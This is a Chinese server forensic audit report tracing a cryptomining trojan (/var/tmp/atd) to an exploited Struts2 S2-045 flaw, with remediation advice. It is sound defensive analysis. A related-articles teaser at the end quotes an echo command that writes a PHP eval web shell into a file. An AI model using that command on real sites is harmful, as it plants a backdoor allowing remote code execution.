某服务器安全溯源审计报告

流量关联分析

通过查看服务器连接的程序发现有外网ip 23.33.178.8和91.121.2.76两个,查看到clock-applet一般为程序自带的文件,而91.121.2.76 IP显示的程序为./atd。

然后再通过抓取服务器数据包进行流量分析

抓取了将近一个小时的流量数据包为280条,发现并没有发起大规模攻击操作行为。

木马程序分析

之后再进行查看程序./atd。

发现确实存在该运行的程序文件,再找到程序的位置:

查看到有几个目录文件,排查之后发现第一个/var/tmp,从时间和文件大小来看是会存在问题

再对/var/tmp/atd进行导出程序,放入木马分析系统进行检验是否有木马行为

对atd文件进行木马扫描分析得出是比特币木马病毒文件

对trtgsasefd.conf文件进行木马分析未发现问题

对外网IP:23.33.178.8中的clock-applet文件进行木马分析未发现问题

日志记录分析

日志文件只有8月和9月份的

查看/var/log/messages中没有发现该ip入侵记录

发现通过22远程端口成功登录的外网ip:60.191.15.83 101.68.90.115(有可能是员工正常行为)

查看/var/log/secure中记录不全没有发现异常

查看/var/log/lastlog以及last记录没有发现异常登录记录

入侵来源分析

结合以上分析发现,攻击者在6月7号晚上23点就已经入侵成功,服务器被攻击有可能来自框架系统或插件漏洞引起,因此调用0day脚本测试,检验到漏洞存在,再使用专门的工具复现该st2-045漏洞

总结报告描述

网站对外可访问,因存在Struts-045插件漏洞,故而造成服务器被入侵当成挖矿肉鸡。建议可先暂停服务器环境,之后重装系统并对Struts插件进行升级修复操作以及对文件clock-applet进行删除。

原文发布于微信公众号 - 网络安全社区悦信安(yuexin_an)

原文发表时间:2017-09-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏北京马哥教育

黑客常用linux入侵常用命令,有你不知道的没?

[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog...

26430
来自专栏Java学习网

Web应用程序遭黑客入侵的五大征兆

  大多数针对Web应用程序的攻击都非常隐蔽,不容易发现。从2015威瑞森数据泄漏调查报告来看,攻击者平均可以在网络上潜伏205天不被发现。许多组织都是从其他人...

34350
来自专栏未闻Code

MongoDB备份有密码的数据库

在MongoDB使用自带的mongodump备份数据的时候,如果数据库设置了密码,那么在指定mongodump的--password 密码参数的同时,还必须指定...

28330
来自专栏Alan's Lab

不需要钩子,使用 git push 部署网站,

最近的工作又回到了微信公众号开发(创业团队摸石头,什么都得干。。。),在办公室的电脑上搞了台测试服务器,代码库放在办公室另一台电脑上。方便起见,打算给产品服务器...

22230
来自专栏数据和云

按图索骥:Oracle数据库无响应故障的处理思路和方法

熊军(老熊) 云和恩墨西区总经理 Oracle ACED,ACOUG核心会员 无响应故障现象分析 ---- Oracle数据库无响应故障,简单地讲就是数据库实例...

39080
来自专栏FreeBuf

CVE-2018-8174 “双杀”0day漏洞复现

最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击,捕获到了全球首例利用浏览器0day漏洞的新型Office文档攻...

25900
来自专栏walterlv - 吕毅的博客

Git 更安全的强制推送,--force-with-lease

发布于 2018-05-07 11:16 更新于 2018-09...

19920
来自专栏FreeBuf

LaserCrack:一款可扩展的暴力破解框架

lasercrack是一款爆力破解工具,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率,不过我还没有找到ruby写的,一方面是想从原理...

15220
来自专栏大数据架构师专家

docker pull 下载加速-2018

使用docker pull,命令下载镜像太慢了,默认是从国外的,本文记录下如何配置国内阿里云竞相加速方式。文档力求简单.

38420
来自专栏云计算教程系列

如何在CentOS 7上使用MEAN.JS安装MEAN堆栈

术语MEAN最初由Valeri Karpov创造,该术语源自每个组件的第一个字母。Valeri在这篇博客文章中定义了MEAN ,其中他给出了选择在MEAN堆栈的...

7900

扫码关注云+社区

领取腾讯云代金券